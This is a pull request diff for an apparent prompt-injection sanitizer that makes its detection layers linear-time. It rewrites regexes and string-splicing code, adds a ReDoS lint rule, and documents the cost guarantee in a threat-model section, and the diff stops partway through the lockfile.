### PR TITLE
perf: guarantee linear-time processing across the detection layers

### DIFF
--- a/.github/mutation-shards.json
+++ b/.github/mutation-shards.json
@@ -1,7 +1,7 @@
 {
   "splitEvery": 300,
   "split": [
-    { "id": "html", "file": "src/html.mjs" },
+    { "id": "html", "file": "src/html.mjs", "splitEvery": 200 },
     { "id": "standardized-variants", "file": "src/standardized-variants.mjs" },
     { "id": "invisible", "file": "src/invisible.mjs" },
     { "id": "output", "file": "src/output.mjs" },

--- a/.github/scripts/expand-shards.mjs
+++ b/.github/scripts/expand-shards.mjs
@@ -3,8 +3,10 @@
  * Expand the declarative mutation-shard config into a concrete shard matrix.
  *
  * `.github/mutation-shards.json` declares only what a human must decide: which
- * big files are worth chunking into `splitEvery`-line slices, and how many
- * whole-file shards to spread everything else over. WHICH files get mutated is
+ * big files are worth chunking into `splitEvery`-line slices (a `split` entry
+ * may carry its own `splitEvery` where the global width runs long), and how
+ * many whole-file shards to spread everything else over. WHICH files get
+ * mutated is
  * `scripts/shipped-sources.mjs`'s answer, so a newly published module or a new
  * `.hooks/lib` one joins the matrix the moment it is committed — no config to
  * remember, and no hand-listed second copy of the mutated set to drift from it.
@@ -96,16 +98,26 @@ export function expandShards(repoRoot) {
   }
 
   const shards = [];
-  for (const { id, file } of config.split ?? []) {
-    const chunks = Math.max(
-      1,
-      Math.ceil(lineCount(repoRoot, file) / splitEvery),
-    );
+  for (const entry of config.split ?? []) {
+    const { id, file } = entry;
+    // A shard's runtime tracks the MUTANTS in its slice, not its line count, so
+    // a file whose lines are dense in mutable expressions needs thinner slices
+    // to stay under the matrix job's timeout. Per-entry rather than global:
+    // thinning every file to the densest one's width pays a full Stryker dry
+    // run per extra shard on files that already run in a third of the budget.
+    const lines = entry.splitEvery ?? splitEvery;
+    if (!Number.isInteger(lines) || lines <= 0) {
+      throw new Error(
+        `mutation-shards.json split entry ${id} has splitEvery ` +
+          `${JSON.stringify(entry.splitEvery)}, which is not a positive integer`,
+      );
+    }
+    const chunks = Math.max(1, Math.ceil(lineCount(repoRoot, file) / lines));
     for (let i = 0; i < chunks; i++) {
-      const start = i * splitEvery + 1;
+      const start = i * lines + 1;
       // The last chunk ends open so the tail is always covered even if the file
       // grew past the last boundary since this expansion was computed.
-      const end = i === chunks - 1 ? EOF_SENTINEL : (i + 1) * splitEvery;
+      const end = i === chunks - 1 ? EOF_SENTINEL : (i + 1) * lines;
       shards.push({ id: `${id}-${i + 1}`, mutate: `${file}:${start}-${end}` });
     }
   }

--- a/THREAT-MODEL.md
+++ b/THREAT-MODEL.md
@@ -809,12 +809,15 @@ carry no backtracking at all, so no pattern analyzer will ever report them:
 - work that is not a pattern at all — a string rebuilt once per finding, a
   prefix re-sliced inside a loop, a re-walk of an already-walked node.
 
-`test/algorithmic-complexity.test.mjs` runs each entry point over an adversarial
+`test/algorithmic-complexity.test.mjs` runs an entry point over an adversarial
 input at two sizes 8x apart and asserts the cost grew like the input rather than
 like its square, with a known-quadratic specimen as the control that proves the
-harness can still see one. `tests/secrets/test_algorithmic_complexity.py` is the
-twin over the Python engine, and `test/hook-latency.test.mjs` holds the same
-paths to a budget in absolute terms.
+harness can still see one. Each case also asserts, at the size it measures, that
+the input still reaches the code the case is about — a length gate answering
+first is how such a case quietly degrades into timing nothing.
+`tests/secrets/test_algorithmic_complexity.py` is the twin over the Python
+engine. `test/hook-latency.test.mjs` covers the three blocking hook paths
+instead, in cost per calibration pass, with one wall-clock ceiling.
 
 **Idioms new code is held to.** Each is the fix for a defect one of the gates
 caught:

--- a/THREAT-MODEL.md
+++ b/THREAT-MODEL.md
@@ -787,9 +787,13 @@ hangs on a crafted paste has failed as completely as one that misses the
 payload. This is a property of the whole surface, not of any one layer, so it is
 stated once here rather than restated per layer.
 
-**The contract.** Every entry point costs time linear in its input, up to the
-constant factors a parse pays. Two gates enforce it, because neither can see
-what the other does.
+**The contract.** No entry point costs more than `n log n` in its input: linear
+up to the constant factors a parse pays, and one sort where findings or splice
+ranges arrive in an order the caller does not promise (`foldConfusables`,
+`mergeRanges`). The bound that matters is that nothing is _quadratic_ — a sort
+of the findings in a 1 MB paste is milliseconds, a quadratic rescan of it is
+minutes — and quadratic is what the two gates below are calibrated to catch,
+because neither can see what the other does.
 
 **Static — every pattern.** `tests/test_redos_js_static_guard.py` drives
 regexploit over an inventory that `scripts/extract-js-regexes.mjs` extracts by

--- a/THREAT-MODEL.md
+++ b/THREAT-MODEL.md
@@ -779,6 +779,65 @@ The knob adds no layer and changes no layer's semantics. Ambiguous input still
 fails open at the detection level (precision over recall), as it always has —
 that is a separate, and unrelated, sense of the phrase.
 
+## Linear-time guarantee
+
+Every layer here reads attacker-controlled text inside a hook the user waits on,
+so a cost blow-up is a denial of service against the agent: the sanitizer that
+hangs on a crafted paste has failed as completely as one that misses the
+payload. This is a property of the whole surface, not of any one layer, so it is
+stated once here rather than restated per layer.
+
+**The contract.** Every entry point costs time linear in its input, up to the
+constant factors a parse pays. Two gates enforce it, because neither can see
+what the other does.
+
+**Static — every pattern.** `tests/test_redos_js_static_guard.py` drives
+regexploit over an inventory that `scripts/extract-js-regexes.mjs` extracts by
+walking the TypeScript AST of every shipped `.mjs` (not by matching regex source
+with a regex), and fails on any pattern with super-linear backtracking. A
+`RegExp(…)` built at runtime must be statically resolvable or carry a written
+exemption, so a new dynamic pattern is a red build rather than a hole.
+`tests/secrets/test_redos_static_guard.py` is the twin over the Python engine,
+and `eslint-plugin-redos` reports the same class in the editor, before CI.
+
+**Empirical — everything the static gates cannot see.** Two shapes of quadratic
+carry no backtracking at all, so no pattern analyzer will ever report them:
+
+- an **unanchored** pattern retried at every start offset, each attempt linear
+  and none of them backtracking — `(?=.*[A-Z])(?=.*[0-9])` against a long value
+  carrying neither class, or a `[^>]*$` tail rescanned from every `<`;
+- work that is not a pattern at all — a string rebuilt once per finding, a
+  prefix re-sliced inside a loop, a re-walk of an already-walked node.
+
+`test/algorithmic-complexity.test.mjs` runs each entry point over an adversarial
+input at two sizes 8x apart and asserts the cost grew like the input rather than
+like its square, with a known-quadratic specimen as the control that proves the
+harness can still see one. `tests/secrets/test_algorithmic_complexity.py` is the
+twin over the Python engine, and `test/hook-latency.test.mjs` holds the same
+paths to a budget in absolute terms.
+
+**Idioms new code is held to.** Each is the fix for a defect one of the gates
+caught:
+
+- Anchor a tail scan, or slice the tail first (`lastIndexOf(">")`) and match a
+  fixed-length pattern against it — never `[^x]*$` over the whole input.
+- Spell alternatives disjointly (`\d+(?:\.\d+)?|\.\d+`, not `\d*\.?\d+`) so a
+  failing match gives up in constant time per step rather than retrying every
+  split of a long run.
+- Bound an unbounded quantifier that can span the input, and stitch the chunks
+  (`src/invisible.mjs`'s `LONG_RUN_CHUNK_RE`), so the backtrack stack has a
+  ceiling that does not move with the input.
+- Assemble a rewritten string once, from an array of pieces — never
+  `text.slice(0, i) + x + text.slice(j)` once per finding.
+- Bound every recursive walk by depth and memo, and thread the wall-clock
+  `Deadline` through the layers that can be skipped, so a budget already spent
+  refuses the work instead of starting it.
+
+The guarantee is about COST, not about verdicts. Where a bound and a detection
+disagree — a value too long to analyze, a walk past `MAX_DEPTH`, a spent
+deadline — the layer takes the false negative and says so, exactly as the
+precision-over-recall doctrine requires everywhere else.
+
 ## Benchmark (`test/injection-corpus.test.mjs`)
 
 The published "invisible prompt injection" corpora fall in two families, and

--- a/eslint.config.mjs
+++ b/eslint.config.mjs
@@ -1,4 +1,5 @@
 import js from "@eslint/js";
+import redos from "eslint-plugin-redos";
 import globals from "globals";
 import tseslint from "typescript-eslint";
 
@@ -92,6 +93,28 @@ export default tseslint.config(
       globals: { ...globals.node },
     },
     rules: { "consistent-return": "error" },
+  },
+  {
+    // Defense in depth beside the regexploit CI gate: regexploit reasons about
+    // Python-flavored patterns extracted statically, so it is blind to the
+    // JS-only constructs (lookbehind, `v`-mode classes) and to any pattern it
+    // fails to extract. `recheck` decides on the real JS regex AST instead, and
+    // it reads polynomial blow-up the extraction gate misses — the two patterns
+    // it found on the style and srcset paths were both invisible to regexploit.
+    //
+    // The SHIPPED code only, not the whole tree. A test asserting on a stderr
+    // string, or a script parsing a committed YAML line, reads input this repo
+    // wrote; recheck reports the same polynomial shapes there, and 56 findings
+    // nobody can act on is how a real one stops being read. The line is what the
+    // input is: attacker-controlled text goes through these files and no others.
+    files: [
+      "src/**/*.mjs",
+      "claude-hooks/**/*.mjs",
+      "bin/**/*.mjs",
+      "plugin/scripts/**/*.mjs",
+    ],
+    plugins: { redos },
+    rules: { "redos/no-vulnerable": "error" },
   },
   {
     // The one module allowed to call esbuild directly — it *is* the guard.

--- a/package.json
+++ b/package.json
@@ -77,6 +77,7 @@
     "c8": "11.0.0",
     "esbuild": "0.28.1",
     "eslint": "10.4.0",
+    "eslint-plugin-redos": "4.5.0",
     "fast-check": "4.8.0",
     "globals": "17.6.0",
     "lint-staged": "^17.0.5",

--- a/plugin/dist/hooks/hook-binaries.sha256
+++ b/plugin/dist/hooks/hook-binaries.sha256
@@ -4,8 +4,8 @@
 # verified against this file before it is installed.
 # repository=AlexanderMattTurner/agent-sanitizer
 # bun=1.3.11
-# bundle=0874901f6897f1d61e88b34cb8798c5272ac50a03beb151c2013aeb86e6b7508
-a5260dad6933a9021a7e814713b6ea1c3198faeed027e0a697ba310a840ec0ee  agent-sanitizer-hooks-darwin-arm64
-ffe936e6af7b30377e509c0022b7769a3f0238a6c40cc8acc2e49881b3db6c58  agent-sanitizer-hooks-darwin-x64
-b887e0b1520666303c22f8ea7144b7d79e7ca694394b7ba84aa16ee752e05b7b  agent-sanitizer-hooks-linux-arm64
-5549a77230d24ad516d7748ba430d4f07c07261b18932322f9ff2d5eb0d8b553  agent-sanitizer-hooks-linux-x64
+# bundle=8076fa0a547b5076e39228f2fd58db50758d795376598b0bc28f521516e68411
+9b111987854b8638d70f057f87ca27401442804058b95fed74fbcf1732595f66  agent-sanitizer-hooks-darwin-arm64
+05b8468ca7e0b9783942b71ab5d1d93d8c632eb8fee712f4935ab05cecca0924  agent-sanitizer-hooks-darwin-x64
+e5903f7c2110f85e8e6a5c8a1bb7f14365cf1f668ecd9df33d7cf6fe8e502d29  agent-sanitizer-hooks-linux-arm64
+58f4e2dd46f18a6171d403784a113a7cccb1ac40bdf177c0c2e5e018e5394099  agent-sanitizer-hooks-linux-x64

--- a/plugin/dist/hooks/hook-binaries.sha256
+++ b/plugin/dist/hooks/hook-binaries.sha256
@@ -4,8 +4,8 @@
 # verified against this file before it is installed.
 # repository=AlexanderMattTurner/agent-sanitizer
 # bun=1.3.11
-# bundle=5d0231a34001cb341747b4203b685111c1fd126f05b6116e2d0521367f3b10a6
-1d87f6d0332cffade759811cf30d2fe7fb20b60cfadd795b8250743b7b9aa737  agent-sanitizer-hooks-darwin-arm64
-1c16989a22fd249449c31de2e9b31689144931811b4bfe8d07f09486c4302df5  agent-sanitizer-hooks-darwin-x64
-e94638c3881d9391076479c9cb73389d259e7e2b07be58491067eb3014e90d91  agent-sanitizer-hooks-linux-arm64
-4bc1eb1656e6e80e59081fa4217657c69b1c45bb25d3da204d8241497c52b07a  agent-sanitizer-hooks-linux-x64
+# bundle=0bdfa4b49e249949323c70a8c5db68670d80840b6cd09c4e799a8a1e7608591b
+bace3d9838a7293ee1bcd8ac0a5bccf06f25b3e3d749c975713fcc120509194e  agent-sanitizer-hooks-darwin-arm64
+4a1199f5d4b5a47a585ebec54f31dfaaf2fc4d80b18a7fcec13cceeecf501945  agent-sanitizer-hooks-darwin-x64
+4f8f91017ab5beab96dcb77bb5fab30f2e8af9aac451a4621b5dbbab4349f568  agent-sanitizer-hooks-linux-arm64
+145dfeae883116b69e7585f856dd944cb1ef018eb8eb464d13c0d8345beda3f3  agent-sanitizer-hooks-linux-x64

--- a/plugin/dist/hooks/hook-binaries.sha256
+++ b/plugin/dist/hooks/hook-binaries.sha256
@@ -4,8 +4,8 @@
 # verified against this file before it is installed.
 # repository=AlexanderMattTurner/agent-sanitizer
 # bun=1.3.11
-# bundle=0bdfa4b49e249949323c70a8c5db68670d80840b6cd09c4e799a8a1e7608591b
-bace3d9838a7293ee1bcd8ac0a5bccf06f25b3e3d749c975713fcc120509194e  agent-sanitizer-hooks-darwin-arm64
-4a1199f5d4b5a47a585ebec54f31dfaaf2fc4d80b18a7fcec13cceeecf501945  agent-sanitizer-hooks-darwin-x64
-4f8f91017ab5beab96dcb77bb5fab30f2e8af9aac451a4621b5dbbab4349f568  agent-sanitizer-hooks-linux-arm64
-145dfeae883116b69e7585f856dd944cb1ef018eb8eb464d13c0d8345beda3f3  agent-sanitizer-hooks-linux-x64
+# bundle=0874901f6897f1d61e88b34cb8798c5272ac50a03beb151c2013aeb86e6b7508
+a5260dad6933a9021a7e814713b6ea1c3198faeed027e0a697ba310a840ec0ee  agent-sanitizer-hooks-darwin-arm64
+ffe936e6af7b30377e509c0022b7769a3f0238a6c40cc8acc2e49881b3db6c58  agent-sanitizer-hooks-darwin-x64
+b887e0b1520666303c22f8ea7144b7d79e7ca694394b7ba84aa16ee752e05b7b  agent-sanitizer-hooks-linux-arm64
+5549a77230d24ad516d7748ba430d4f07c07261b18932322f9ff2d5eb0d8b553  agent-sanitizer-hooks-linux-x64

--- a/plugin/dist/hooks/plugin-hooks.bundle.mjs
+++ b/plugin/dist/hooks/plugin-hooks.bundle.mjs
@@ -44792,9 +44792,11 @@ function selectFoldableFindings(text5, findings) {
     index2 += ch.length;
   }
   flushToken(index2);
-  return findings.filter(
-    (finding2) => [...finding2.char].every((_, i) => foldableAt[finding2.index + i] === 1)
-  );
+  return findings.filter((finding2) => {
+    for (let i = 0; i < finding2.char.length; i++)
+      if (foldableAt[finding2.index + i] !== 1) return false;
+    return true;
+  });
 }
 function foldConfusables(text5, findings) {
   const tail = [];

--- a/plugin/dist/hooks/plugin-hooks.bundle.mjs
+++ b/plugin/dist/hooks/plugin-hooks.bundle.mjs
@@ -44716,7 +44716,7 @@ function describeFolds(findings) {
   const shown = folds.slice(0, MAX_REPORTED_FOLDS).join(", ");
   return folds.length > MAX_REPORTED_FOLDS ? `${shown}, \u2026` : shown;
 }
-function assertFinding(text5, finding2) {
+function assertFinding(finding2, actual) {
   if (!Number.isInteger(finding2.index) || finding2.index < 0)
     throw new Error(
       `Confusable finding has an out-of-range index ${finding2.index}`
@@ -44729,7 +44729,7 @@ function assertFinding(text5, finding2) {
     throw new Error(
       `Confusable finding at index ${finding2.index} names an ASCII char ${JSON.stringify(finding2.char)}`
     );
-  if (!text5.startsWith(finding2.char, finding2.index))
+  if (!actual.startsWith(finding2.char))
     throw new Error(
       `Confusable finding does not match input at index ${finding2.index}: expected ${JSON.stringify(finding2.char)}`
     );
@@ -44750,6 +44750,9 @@ function assertFinding(text5, finding2) {
         )} is not ASCII`
       );
 }
+function bytesAt(text5, finding2) {
+  return text5.slice(finding2.index, finding2.index + finding2.char.length);
+}
 function isTokenBoundary(ch) {
   if (hasNonAscii(ch)) return false;
   const code4 = ch.charCodeAt(0);
@@ -44759,7 +44762,7 @@ function isTokenBoundary(ch) {
   return !isDigit2 && !isUpper && !isLower;
 }
 function selectFoldableFindings(text5, findings) {
-  for (const finding2 of findings) assertFinding(text5, finding2);
+  for (const finding2 of findings) assertFinding(finding2, bytesAt(text5, finding2));
   const flagged = /* @__PURE__ */ new Set();
   for (const finding2 of findings)
     for (let i = 0; i < finding2.char.length; i++)
@@ -44795,24 +44798,37 @@ function selectFoldableFindings(text5, findings) {
 function foldConfusables(text5, findings) {
   const tail = [];
   let cursor = text5.length;
-  const rebuild = () => [...tail].reverse().join("");
   for (const finding2 of [...findings].sort(
     (lhs, rhs) => rhs.index - lhs.index
   )) {
     const end = finding2.index + finding2.char.length;
     if (end <= cursor) {
-      assertFinding(text5, finding2);
+      assertFinding(finding2, bytesAt(text5, finding2));
       tail.push(text5.slice(end, cursor));
     } else {
-      const folded = rebuild();
-      assertFinding(text5.slice(0, cursor) + folded, finding2);
-      tail.length = 0;
-      tail.push(folded.slice(end - cursor));
+      const overlap = takeFromTail(tail, end - cursor);
+      assertFinding(finding2, text5.slice(finding2.index, cursor) + overlap);
     }
     tail.push(finding2.latinEquivalent);
     cursor = finding2.index;
   }
-  return text5.slice(0, cursor) + rebuild();
+  return text5.slice(0, cursor) + [...tail].reverse().join("");
+}
+function takeFromTail(tail, count) {
+  const taken = [];
+  let remaining = count;
+  while (remaining > 0) {
+    const entry = tail.pop();
+    if (entry === void 0) break;
+    if (entry.length > remaining) {
+      taken.push(entry.slice(0, remaining));
+      tail.push(entry.slice(remaining));
+      break;
+    }
+    taken.push(entry);
+    remaining -= entry.length;
+  }
+  return taken.join("");
 }
 function normalizeConfusables(tool, toolInput, options = {}) {
   const { scan: scan2, fields = DEFAULT_FIELDS } = options;

--- a/plugin/dist/hooks/plugin-hooks.bundle.mjs
+++ b/plugin/dist/hooks/plugin-hooks.bundle.mjs
@@ -44813,7 +44813,7 @@ function foldConfusables(text5, findings) {
     tail.push(finding2.latinEquivalent);
     cursor = finding2.index;
   }
-  return text5.slice(0, cursor) + [...tail].reverse().join("");
+  return text5.slice(0, cursor) + tail.reverse().join("");
 }
 function takeFromTail(tail, count) {
   const taken = [];

--- a/plugin/dist/hooks/plugin-hooks.bundle.mjs
+++ b/plugin/dist/hooks/plugin-hooks.bundle.mjs
@@ -44762,7 +44762,8 @@ function isTokenBoundary(ch) {
   return !isDigit2 && !isUpper && !isLower;
 }
 function selectFoldableFindings(text5, findings) {
-  for (const finding2 of findings) assertFinding(finding2, bytesAt(text5, finding2));
+  for (const finding2 of findings)
+    assertFinding(finding2, bytesAt(text5, finding2));
   const flagged = /* @__PURE__ */ new Set();
   for (const finding2 of findings)
     for (let i = 0; i < finding2.char.length; i++)

--- a/plugin/dist/hooks/plugin-hooks.bundle.mjs
+++ b/plugin/dist/hooks/plugin-hooks.bundle.mjs
@@ -45059,14 +45059,16 @@ function hexByte(n) {
   return Math.max(0, Math.min(255, Math.round(n))).toString(16).padStart(2, "0");
 }
 function rgbChannel(token) {
-  const pct = token.match(/^\+?(\d*\.?\d+)%$/);
+  const pct = token.match(/^\+?(\d+(?:\.\d+)?|\.\d+)%$/);
   if (pct) return Math.min(100, parseFloat(pct[1])) / 100 * 255;
-  const num = token.match(/^\+?(\d*\.?\d+)$/);
+  const num = token.match(/^\+?(\d+(?:\.\d+)?|\.\d+)$/);
   if (num) return parseFloat(num[1]);
   return null;
 }
 function hueDegrees(token) {
-  const match = token.match(/^([+-]?\d*\.?\d+)(deg|grad|rad|turn)?$/);
+  const match = token.match(
+    /^([+-]?(?:\d+(?:\.\d+)?|\.\d+))(deg|grad|rad|turn)?$/
+  );
   if (!match) return null;
   const value = parseFloat(match[1]);
   const unit = match[2] || "deg";
@@ -45074,7 +45076,7 @@ function hueDegrees(token) {
   return (deg % 360 + 360) % 360;
 }
 function hslPercent(token) {
-  const match = token.match(/^\+?(\d*\.?\d+)%?$/);
+  const match = token.match(/^\+?(\d+(?:\.\d+)?|\.\d+)%?$/);
   return match ? Math.min(100, parseFloat(match[1])) : null;
 }
 function hslToHex(h2, s2, l) {
@@ -45101,7 +45103,8 @@ function canonicalizeColorFunction(value) {
     alpha = parts2[3];
     parts2.length = 3;
   }
-  if (alpha !== null && /^\+?0*\.?0+%?$/.test(alpha)) return "transparent";
+  if (alpha !== null && /^\+?(?:0+(?:\.0+)?|\.0+)%?$/.test(alpha))
+    return "transparent";
   if (parts2.length !== 3) return null;
   if (isRgb) {
     const channels = parts2.map(rgbChannel);
@@ -45481,8 +45484,10 @@ function scanFragmentTree(html4, tree) {
   return { ranges, warned };
 }
 function foldAbsorb(absorbing, raw) {
-  if (raw.includes(">")) return UNTERMINATED_MARKUP_TAIL_RE.test(raw);
-  return absorbing || UNTERMINATED_MARKUP_TAIL_RE.test(raw);
+  const lastClose = raw.lastIndexOf(">");
+  const opensMarkup = MARKUP_OPENER_RE.test(raw.slice(lastClose + 1));
+  if (lastClose !== -1) return opensMarkup;
+  return absorbing || opensMarkup;
 }
 function commentSpans(value) {
   const tree = parseFragment2(value);
@@ -45716,8 +45721,11 @@ function sanitizeHtml(text5) {
     splices: spliced.pairs
   };
 }
+function hasUpperAndDigit(value) {
+  return /[A-Z]/.test(value) && /[0-9]/.test(value);
+}
 function isBase64UrlBlob(value) {
-  return BLOB_VALUE_B64URL_RE.test(value) && B64URL_MIXED_RE.test(value);
+  return BLOB_VALUE_B64URL_RE.test(value) && hasUpperAndDigit(value);
 }
 function chunkedBlobResidue(value) {
   const joined = value.replace(BLOB_SEPARATOR_RE, "");
@@ -45725,7 +45733,7 @@ function chunkedBlobResidue(value) {
 }
 function isChunkedPathBlob(segment) {
   const joined = chunkedBlobResidue(segment);
-  return joined !== null && joined.length > DIGEST_MAX_LEN && (PATH_BLOB_RE.test(joined) && B64URL_MIXED_RE.test(joined) || isBase64UrlBlob(joined));
+  return joined !== null && joined.length > DIGEST_MAX_LEN && (PATH_BLOB_RE.test(joined) && hasUpperAndDigit(joined) || isBase64UrlBlob(joined));
 }
 function isBlobValue(value, digestIsBenign) {
   if (HEX_ONLY_RE.test(value))
@@ -45891,7 +45899,9 @@ function parseSrcset(value) {
     const start = i;
     while (i < n && !SRCSET_WS_RE.test(value[i])) i++;
     const run = value.slice(start, i);
-    const url = run.replace(/,+$/, "");
+    let cut = run.length;
+    while (cut > 0 && run[cut - 1] === ",") cut--;
+    const url = run.slice(0, cut);
     if (url) urls.push(url);
     if (run.endsWith(",")) continue;
     let depth = 0;
@@ -46018,7 +46028,7 @@ function detectConfusableHosts(text5) {
   }
   return threats.length > 0 ? threats : null;
 }
-var NEAR_ZERO_EPSILON, OFFSCREEN_ABSOLUTE_THRESHOLD, OFFSCREEN_VIEWPORT_THRESHOLD, ABSOLUTE_UNITS, VIEWPORT_UNITS, ANGLE_UNITS, NAMED_COLORS, BLOCK_AXIS_EXTENT_PROPS, INLINE_AXIS_EXTENT_PROPS, BORDER_SHORTHANDS, BORDER_WIDTH_KEYWORDS, FONT_SIZE_UNITS, CSS_PROPERTY_IDENT_RE, REPORTED_TAGS, VOID_ELEMENTS2, FOREIGN_ELEMENTS, RAW_TEXT_ELEMENTS, parseFragment2, PLACEHOLDER_LABEL, PLACEHOLDER_KEY_LEN, LAYER2_PLACEHOLDER_RE, HIDDEN_PLACEHOLDER, COMMENT_PLACEHOLDER, UNPARSEABLE_PLACEHOLDER, mdParser, parseMarkdown, MARKDOWN_CODE_HINT, BOGUS_COMMENT_OPEN_RE, UNTERMINATED_MARKUP_TAIL_RE, PHRASING_ROOTS, FLOW_HTML_PARENTS, MAX_SPLICE_ROUNDS, EXFIL_INDICATORS, KEYWORD_PARAM_NAME_RE, LONG_QUERY_THRESHOLD, DATA_URI_ACTIVE_RE, DATA_URI_LENGTH_THRESHOLD, SCRIPT_URI_RE, RELATIVE_URL_BASE, BENIGN_BLOB_PARAM_RE, BENIGN_SHORT_PARAM_RE, BENIGN_SHORT_VALUE_MAX_LEN, BENIGN_SHORT_TOTAL_MAX_LEN, PUBLIC_KEY_ID_PARAM_RE, BLOB_VALUE_MIN_LEN, OPAQUE_TOKEN_RE, VALUE_HAS_DIGIT_RE, BLOB_VALUE_B64_RE, HEX_ONLY_RE, HEX_BLOB_MIN_LEN, DIGEST_HEX_LENGTHS, BLOB_VALUE_B64URL_RE, B64URL_MIXED_RE, PATH_BLOB_RE, DIGEST_MAX_LEN, BLOB_SEPARATOR_RE, BLOB_RUN_SPLIT_RE, SRCSET_WS_RE, OFF_ORIGIN_REASON;
+var NEAR_ZERO_EPSILON, OFFSCREEN_ABSOLUTE_THRESHOLD, OFFSCREEN_VIEWPORT_THRESHOLD, ABSOLUTE_UNITS, VIEWPORT_UNITS, ANGLE_UNITS, NAMED_COLORS, BLOCK_AXIS_EXTENT_PROPS, INLINE_AXIS_EXTENT_PROPS, BORDER_SHORTHANDS, BORDER_WIDTH_KEYWORDS, FONT_SIZE_UNITS, CSS_PROPERTY_IDENT_RE, REPORTED_TAGS, VOID_ELEMENTS2, FOREIGN_ELEMENTS, RAW_TEXT_ELEMENTS, parseFragment2, PLACEHOLDER_LABEL, PLACEHOLDER_KEY_LEN, LAYER2_PLACEHOLDER_RE, HIDDEN_PLACEHOLDER, COMMENT_PLACEHOLDER, UNPARSEABLE_PLACEHOLDER, mdParser, parseMarkdown, MARKDOWN_CODE_HINT, BOGUS_COMMENT_OPEN_RE, MARKUP_OPENER_RE, PHRASING_ROOTS, FLOW_HTML_PARENTS, MAX_SPLICE_ROUNDS, EXFIL_INDICATORS, KEYWORD_PARAM_NAME_RE, LONG_QUERY_THRESHOLD, DATA_URI_ACTIVE_RE, DATA_URI_LENGTH_THRESHOLD, SCRIPT_URI_RE, RELATIVE_URL_BASE, BENIGN_BLOB_PARAM_RE, BENIGN_SHORT_PARAM_RE, BENIGN_SHORT_VALUE_MAX_LEN, BENIGN_SHORT_TOTAL_MAX_LEN, PUBLIC_KEY_ID_PARAM_RE, BLOB_VALUE_MIN_LEN, OPAQUE_TOKEN_RE, VALUE_HAS_DIGIT_RE, BLOB_VALUE_B64_RE, HEX_ONLY_RE, HEX_BLOB_MIN_LEN, DIGEST_HEX_LENGTHS, BLOB_VALUE_B64URL_RE, PATH_BLOB_RE, DIGEST_MAX_LEN, BLOB_SEPARATOR_RE, BLOB_RUN_SPLIT_RE, SRCSET_WS_RE, OFF_ORIGIN_REASON;
 var init_html4 = __esm({
   "src/html.mjs"() {
     "use strict";
@@ -46309,7 +46319,7 @@ var init_html4 = __esm({
     parseMarkdown = lastParseCached((text5) => mdParser.parse(text5));
     MARKDOWN_CODE_HINT = /```|~~~|^(?: {4}| *\t)/m;
     BOGUS_COMMENT_OPEN_RE = /<[!?]/g;
-    UNTERMINATED_MARKUP_TAIL_RE = /<(?:[!?]|\/?[a-zA-Z])[^>]*$/;
+    MARKUP_OPENER_RE = /<(?:[!?]|\/?[a-zA-Z])/;
     PHRASING_ROOTS = /* @__PURE__ */ new Set(["paragraph", "heading", "tableCell"]);
     FLOW_HTML_PARENTS = /* @__PURE__ */ new Set([
       "root",
@@ -46338,7 +46348,6 @@ var init_html4 = __esm({
     HEX_BLOB_MIN_LEN = 32;
     DIGEST_HEX_LENGTHS = /* @__PURE__ */ new Set([32, 40, 56, 64, 96, 128]);
     BLOB_VALUE_B64URL_RE = /^[A-Za-z0-9_-]{40,}={0,2}$/;
-    B64URL_MIXED_RE = /(?=.*[A-Z])(?=.*[0-9])/;
     PATH_BLOB_RE = /^(?:[A-Za-z0-9+/]+={0,2}|[A-Fa-f0-9]+)$/;
     DIGEST_MAX_LEN = 128;
     BLOB_SEPARATOR_RE = /[.,]/g;

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -84,6 +84,9 @@ importers:
       eslint:
         specifier: 10.4.0
         version: 10.4.0(jiti@2.6.1)
+      eslint-plugin-redos:
+        specifier: 4.5.0
+        version: 4.5.0(eslint@10.4.0(jiti@2.6.1))
       fast-check:
         specifier: 4.8.0
         version: 4.8.0
@@ -785,6 +788,10 @@ packages:
     cpu: [x64]
     os: [win32]
 
+  '@pkgr/core@0.1.2':
+    resolution: {integrity: sha512-fdDH1LSGfZdTH2sxdpVMw31BanV28K/Gry0cVFxaNP77neJSkd82mM8ErPNYs9e+0O7SdHBLTDzDgwUuy18RnQ==}
+    engines: {node: ^12.20.0 || ^14.18.0 || >=16.0.0}
+
   '@sec-ant/readable-stream@0.4.1':
     resolution: {integrity: sha512-831qok9r2t8AlxLko40y2ebgSDhenenCatLVeW/uBtnHPyhHOvG0C7TvfgecV+wHzIm5KUICgzmVpWS+IMEAeg==}
 
@@ -1180,6 +1187,12 @@ packages:
   escape-string-regexp@5.0.0:
     resolution: {integrity: sha512-/veY75JbMK4j1yjvuUxuVsiS/hr/4iHs9FTT6cgTexxdE0Ly/glccBAkloH/DofkjRbZU3bnoj38mOmhkZ0lHw==}
     engines: {node: '>=12'}
+
+  eslint-plugin-redos@4.5.0:
+    resolution: {integrity: sha512-MwEEpFRmt7MWoqLCdAgN2DyOKnIVzRm3bqCUIQc/+iMJhkRxDCZ+wYQpkaYAZzemDlqUGGQ+twL3AahTNQtqFA==}
+    engines: {node: '>=20'}
+    peerDependencies:
+      eslint: '>= 3'
 
   eslint-scope@9.1.2:
     resolution: {integrity: sha512-xS90H51cKw0jltxmvmHy2Iai1LIqrfbw57b79w/J7MfvDfkIkFZ+kj6zC3BjtUwh150HsSSdxXZcsuv72miDFQ==}
@@ -1803,6 +1816,33 @@ packages:
     resolution: {integrity: sha512-O9gl3zCl5h5blw1KGUzQKhA5oUXSl8rwUIM5o0S3nCXMliSvy5Dzx7/DJcI+SwgICv+IneSZwhBh1oSyEHA71A==}
     engines: {node: '>=0.6'}
 
+  recheck-jar@4.5.0:
+    resolution: {integrity: sha512-Ad7oCQmY8cQLzd3QVNXjzZ+S6MbImGhR4AaW2yiGzteOfMV45522rt6nSzFyt8p3mCEaMcm/4MoZrMSxUcCbrA==}
+
+  recheck-linux-x64@4.5.0:
+    resolution: {integrity: sha512-52kXsR/v+IbGIKYYFZfSZcgse/Ci9IA2HnuzrtvRRcfODkcUGe4n72ESQ8nOPwrdHFg9i4j9/YyPh1HWWgpJ6A==}
+    cpu: [x64]
+    os: [linux]
+
+  recheck-macos-arm64@4.5.0:
+    resolution: {integrity: sha512-qIyK3dRuLkORQvv0b59fZZRXweSmjjWaoA4K8Kgifz0anMBH4pqsDV6plBlgjcRmW9yC12wErIRzifREaKnk2w==}
+    cpu: [arm64]
+    os: [darwin]
+
+  recheck-macos-x64@4.5.0:
